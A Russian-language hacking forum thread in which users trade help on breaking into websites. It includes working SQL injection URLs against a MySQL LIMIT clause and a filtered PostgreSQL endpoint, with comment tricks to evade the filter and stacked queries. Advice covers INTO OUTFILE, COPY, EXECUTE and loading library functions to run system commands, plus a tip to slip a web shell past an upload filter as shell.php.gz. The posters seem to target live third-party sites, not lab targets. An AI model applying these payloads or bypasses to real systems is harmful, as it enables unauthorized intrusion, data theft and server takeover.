Старый 29.04.2014, 21:03   #3201
z0mbie
 
Регистрация: 05.08.2010
Сообщений: 68
Репутация: 0
По умолчанию

Есть иньекция, как я понял в order by
site.com/index.php?p=news&page=1'
Код:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '', 50' at line 1:SELECT * FROM `news` WHERE 1 = 1 ORDER BY `id` DESC LIMIT 1', 50
при
site.com/index.php?p=news&page=0,1000%20--%20
успешно отображает первые 1000 записей
Можно ли выполнить подзапрос после order by? Или как то можно по другому раскрутить?
z0mbie вне форума   Ответить с цитированием
Старый 30.04.2014, 17:20   #3202
euro
 
Регистрация: 09.07.2010
Сообщений: 66
Репутация: 8
По умолчанию

PHP код:
if (!$error && isset($_REQUEST["uploadbutton"]))
{ if (
is_uploaded_file($_FILES["dumpfile"]["tmp_name"]) && ($_FILES["dumpfile"]["error"])==0)
  { 
    
$uploaded_filename=str_replace(" ","_",$_FILES["dumpfile"]["name"]);
    
$uploaded_filename=preg_replace("/[^_A-Za-z0-9-\.]/i",'',$uploaded_filename);
    
$uploaded_filepath=str_replace("\\","/",$upload_dir."/".$uploaded_filename);

    
do_action('file_uploaded');

    if (
file_exists($uploaded_filename))
    { echo (
"<p class=\"error\">File $uploaded_filename already exist! Delete and upload again!</p>\n");
    }
    else if (!
preg_match("/(\.(sql|gz|csv))$/i",$uploaded_filename))
    { echo (
"<p class=\"error\">You may only upload .sql .gz or .csv files.</p>\n");
    }
    else if (!@
move_uploaded_file($_FILES["dumpfile"]["tmp_name"],$uploaded_filepath))
    { echo (
"<p class=\"error\">Error moving uploaded file ".$_FILES["dumpfile"]["tmp_name"]." to the $uploaded_filepath</p>\n");
      echo (
"<p>Check the directory permissions for $upload_dir (must be 777)!</p>\n");
    }
    else
    { echo (
"<p class=\"success\">Uploaded file saved as $uploaded_filename</p>\n");
    }
  }
  else
  { echo (
"<p class=\"error\">Error uploading file ".$_FILES["dumpfile"]["name"]."</p>\n");
  }

возможен ли аплоад php ?
euro вне форума   Ответить с цитированием
Старый 01.05.2014, 09:42   #3203
Enigma
 
Аватар для Enigma
 
Регистрация: 17.06.2013
Сообщений: 37
Репутация: 12
По умолчанию

.php явно не получится загрузить.

Но можешь попробовать загрузить shell.php.gz, а потом обратиться к нему. Возможно сработает.
Enigma вне форума   Ответить с цитированием
Старый 01.05.2014, 13:44   #3204
}{оттабыч
Banned
 
Регистрация: 08.10.2010
Сообщений: 188
Репутация: 53
По умолчанию

Цитата:
Сообщение от z0mbie Посмотреть сообщение
Есть иньекция, как я понял в order by
site.com/index.php?p=news&page=1'
Код:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '', 50' at line 1:SELECT * FROM `news` WHERE 1 = 1 ORDER BY `id` DESC LIMIT 1', 50
при
site.com/index.php?p=news&page=0,1000%20--%20
успешно отображает первые 1000 записей
Можно ли выполнить подзапрос после order by? Или как то можно по другому раскрутить?
1) INTO OUTFILE если есть привилегия FILE и другие условия
2) Stacked queries (PDO_MYSQL, MySQLi)
}{оттабыч вне форума   Ответить с цитированием
Старый 04.05.2014, 13:40   #3205
0ri0n
 
Регистрация: 12.12.2011
Сообщений: 44
Репутация: 0
По умолчанию

Существуют различные уязвимости в сервиса. например FTP.
Данные уязвимости возникают, если не обновлять сервисы.

Нашёл пару серверов явно устаревших. и не обновляемых.
Как узнал? баннера выдали версию.

Но почему то эксплоиты на них не действуют.
Какие могут быть варианты? почему эксплоит созданный под эту версию фтп и эту версию фаиловй системы. не пашут
0ri0n вне форума   Ответить с цитированием
Старый 04.05.2014, 14:33   #3206
NameSpace
 
Регистрация: 21.12.2012
Сообщений: 146
Репутация: 52
По умолчанию

Цитата:
Сообщение от 0ri0n Посмотреть сообщение
Какие могут быть варианты? почему эксплоит созданный под эту версию фтп и эту версию фаиловй системы. не пашут
Это смотря какой эксплоит. Есть различные их типы, например RCE, Buffer Overflow Exploit, Privilege escalation, Auth Bypass, etc.
NameSpace вне форума   Ответить с цитированием
Старый 04.05.2014, 18:37   #3207
Tim
 
Аватар для Tim
 
Регистрация: 24.03.2011
Сообщений: 59
Репутация: 3
По умолчанию

Есть варианты обхода фильтра в postgress?

true
PHP код:
script.php?prod_id=-1+UNION+SELECT+NULL,NULL,NULL,NULL,NULL,session_user,NULL+/*f-rom+information_schema.columns*/-- 
false
PHP код:
script.php?prod_id=-1+UNION+SELECT+NULL,NULL,NULL,NULL,NULL,session_user,NULL+/*from+information_schema.columns*/-- 
Также фильтр срабатывает на UPDATE SET и INSERT INTO
А вот таблички можно создавать
true
PHP код:
script.php?prod_id=-1+UNION+SELECT+NULL,NULL,NULL,NULL,NULL,session_user,NULL;CREATE+TABLE+filetbl(file+text)--+
-- 
Tim вне форума   Ответить с цитированием
Старый 05.05.2014, 06:35   #3208
NameSpace
 
Регистрация: 21.12.2012
Сообщений: 146
Репутация: 52
По умолчанию

Tim, Фильтр на FROM вкупе с SELECT или ещё чем-то? Какая версия?

Документация: https://www.postgresql.org/docs/9.0/static/sql-commands.html

Согласно статье из раздела, в PostgresSQL возможно загрузить функцию из библиотеки и выполнять системные команды. Если получится это сделать - обход не понадобится.
NameSpace вне форума   Ответить с цитированием
Старый 08.05.2014, 07:51   #3209
Tim
 
Аватар для Tim
 
Регистрация: 24.03.2011
Сообщений: 59
Репутация: 3
По умолчанию

Цитата:
Сообщение от NameSpace Посмотреть сообщение
Tim, Фильтр на FROM вкупе с SELECT или ещё чем-то? Какая версия?

Документация: https://www.postgresql.org/docs/9.0/static/sql-commands.html

Согласно статье из раздела, в PostgresSQL возможно загрузить функцию из библиотеки и выполнять системные команды. Если получится это сделать - обход не понадобится.
Да, если в запросе присутсвует SELECT и FROM, тогда срабатывает фильтр.
Сервер вообще не возвращает ответ: Content-Length: 0

Версия
PostgreSQL 9.0.4 on x86_64-unknown-linux-gnu, compiled by GCC gcc (GCC) 4.1.2 20080704 (Red Hat 4.1.2-54), 64-bit

Функции вроде создает,т.к. фильтр не срабатывает, но команды не выполняются.
Tim вне форума   Ответить с цитированием
Старый 08.05.2014, 08:37   #3210
NameSpace
 
Регистрация: 21.12.2012
Сообщений: 146
Репутация: 52
По умолчанию

Tim, Мало информации даете. Вывода ошибок (или косвенного сообщения о том, что в одном из запросов произошла ошибка) нет? Известно имя хоть одной таблицы, информацию из которой выводят скрипты (можно попробовать подобрать)? Пути известны? Файлы можете создавать? Все три варианта не сработали?

Смотрите документацию по ссылке. Например COPY:
PHP код:
COPY table_name [ ( column [, ...] ) ]
    
FROM 'filename' STDIN }
    [ [ 
WITH ] ( option [, ...] ) ] 
Можно скопировать всю информацию из таблицы в файл без всякого SELECT.

Здесь приводят пример использования EXECUTE. С помощью него можно обойти фильтры (но нельзя напрямую вывести информацию). Вы пробовали его использовать? Если сработает - решите все проблемы моментально.

Последний раз редактировалось NameSpace; 08.05.2014 в 09:01..
NameSpace вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2021, Jelsoft Enterprises Ltd. Перевод: zCarot